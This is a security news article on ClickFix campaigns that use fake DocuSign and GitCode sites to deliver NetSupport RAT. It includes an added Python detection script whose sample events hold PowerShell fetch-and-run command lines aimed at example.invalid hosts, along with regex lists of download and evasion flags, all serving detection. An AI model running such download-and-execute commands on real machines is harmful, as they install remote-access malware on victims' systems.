- Threat actors create fake DocuSign and GitCode sites
- The websites come with a fake CAPTCHA and other scam mechanisms
- Victims are fooled into downloading a Trojan
Security researchers have found fake GitCode and DocuSign sites that distribute remote access Trojan (RAT) malware using the infamous ClickFix method.
Experts from DomainTools Investigations (DTI) found "malicious multi-stage downloader PowerShell scripts" hosted on spoofed sites that invite visitors to open the Windows Run dialog and execute a command that the page has copied to their clipboard.
"After doing so, the PowerShell script downloads another downloader script and executes it on the system, which in turn retrieves a payload and eventually performs the installation of NetSupport RAT on the infected machines," the researchers said in their report. These multiple stages and downloads are designed to avoid detection and help the campaign "be more resilient to security investigations and removal."
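The execution chain described above leaves a recognisable footprint on the endpoint: a shell launched from the Run dialog (so its parent is explorer.exe) whose command line contains a download-and-execute primitive, and an entry in the user's RunMRU registry key recording what was pasted. The following is an added example written for this article, not code from the DomainTools report: it scores constructed Sysmon-style process-creation events and constructed RunMRU values for that pattern. The event schema, the sample command lines (using example.invalid hosts), the keyword lists and the threshold are all assumptions made for illustration.

```python
"""ClickFix detection heuristic (added example; constructed data, not real telemetry)."""
import re

# Constructed process-creation events in a Sysmon-like shape (assumed schema).
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -nop -c "iex (iwr https://example.invalid/verify.txt -UseBasicParsing).Content"'},
    {"pid": 4188, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -c \"& { $d=(New-Object Net.WebClient).DownloadString('http://example.invalid/s2.ps1'); Invoke-Expression $d }\""},
    {"pid": 5001, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Vendor\Updater.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\ProgramData\Vendor\update.ps1"},
    {"pid": 5100, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "cmd /c dir"},
]

# Constructed RunMRU values: MRUList gives most-recent-first order, entries end with "\1".
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -nop -c "iex (iwr https://example.invalid/verify.txt -UseBasicParsing).Content"\\1',
    "c": "cmd\\1",
}

# Assumed indicator lists; tune to your environment.
DOWNLOAD_PATTERNS = re.compile(r"(?i)(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|curl\s|start-bitstransfer)")
HIDE_PATTERNS = re.compile(r"(?i)(-w(indowstyle)?\s+hidden|-nop|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass|-enc|-encodedcommand)")
URL_PATTERN = re.compile(r"(?i)https?://[^\s'\"]+")
RUN_DIALOG_PARENTS = {"explorer.exe"}   # Win+R / Run dialog spawns children under explorer.exe
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}


def basename(path):
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Score one process-creation event; returns (score, reasons)."""
    reasons, score = [], 0
    if basename(ev["image"]) not in SHELLS:
        return 0, reasons
    if basename(ev["parent_image"]) in RUN_DIALOG_PARENTS:
        score += 2
        reasons.append("shell spawned by explorer.exe (Run dialog / Win+R)")
    if DOWNLOAD_PATTERNS.search(ev["cmdline"]):
        score += 2
        reasons.append("download-and-execute primitive in command line")
    if HIDE_PATTERNS.search(ev["cmdline"]):
        score += 1
        reasons.append("evasion switch (hidden window / no profile / policy bypass)")
    if URL_PATTERN.search(ev["cmdline"]):
        score += 1
        reasons.append("URL embedded in command line")
    return score, reasons


def find_clickfix(events, threshold=4):
    """Return events at or above the (assumed) threshold, with extracted URLs for triage."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"pid": ev["pid"], "score": score, "reasons": reasons,
                         "urls": URL_PATTERN.findall(ev["cmdline"])})
    return hits


def runmru_entries(values):
    """Walk RunMRU in MRUList order, strip the trailing '\\1', and score each typed command
    as if it were a shell launched under explorer.exe (which is what the Run dialog does)."""
    out = []
    for key in values.get("MRUList", ""):
        raw = values.get(key, "")
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        tokens = cmd.split()
        first = tokens[0].lower() if tokens else ""
        exe = first if first.endswith(".exe") else first + ".exe"
        score, _ = score_event({"image": exe, "parent_image": "explorer.exe", "cmdline": cmd})
        out.append((key, cmd, score))
    return out


if __name__ == "__main__":
    for hit in find_clickfix(SAMPLE_EVENTS):
        print(hit)
    for key, cmd, score in runmru_entries(SAMPLE_RUNMRU):
        print(f"RunMRU[{key}] score={score}: {cmd}")
```

The benign Run-dialog entries (cmd, notepad) stay below the threshold because the explorer.exe parent alone is only weak evidence; it is the combination with a download primitive and an embedded URL that flags the two constructed ClickFix-style command lines. In a real deployment the URLs pulled from hits are the first pivot for blocking and for retrieving the second-stage script.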
SocGholish
They also said they don't know exactly how victims end up on these sites. However, it is safe to assume that social engineering, e-mail spam and possibly malvertising are part of the methodology. In some cases, the fake sites also come with a fake CAPTCHA verification mechanism that needs to be "solved": the victim is asked to copy and paste a command into the Run dialog, which effectively downloads the malware.
DTI could not confirm the attacker's identity, but emphasized that it had observed a similar campaign in late 2024, which was attributed to SocGholish:
"In particular, the techniques involved are common, and NetSupport Manager is a legitimate management tool known to be used as a RAT by several threat groups such as FIN7, Scarlet Goldfinch, Storm-0408 and others," the report concluded.
SocGholish, also known as FakeUpdates, is known for its fake browser and fake software update alerts. After compromising a site, the crooks inject a popup notifying visitors that their browser or operating system needs a "fix" or "update".
This is the "original" ClickFix method, one that evolved from the old "you have a virus" popups that imitated popular antivirus programs and pushed fake antivirus software.
Via The Hacker News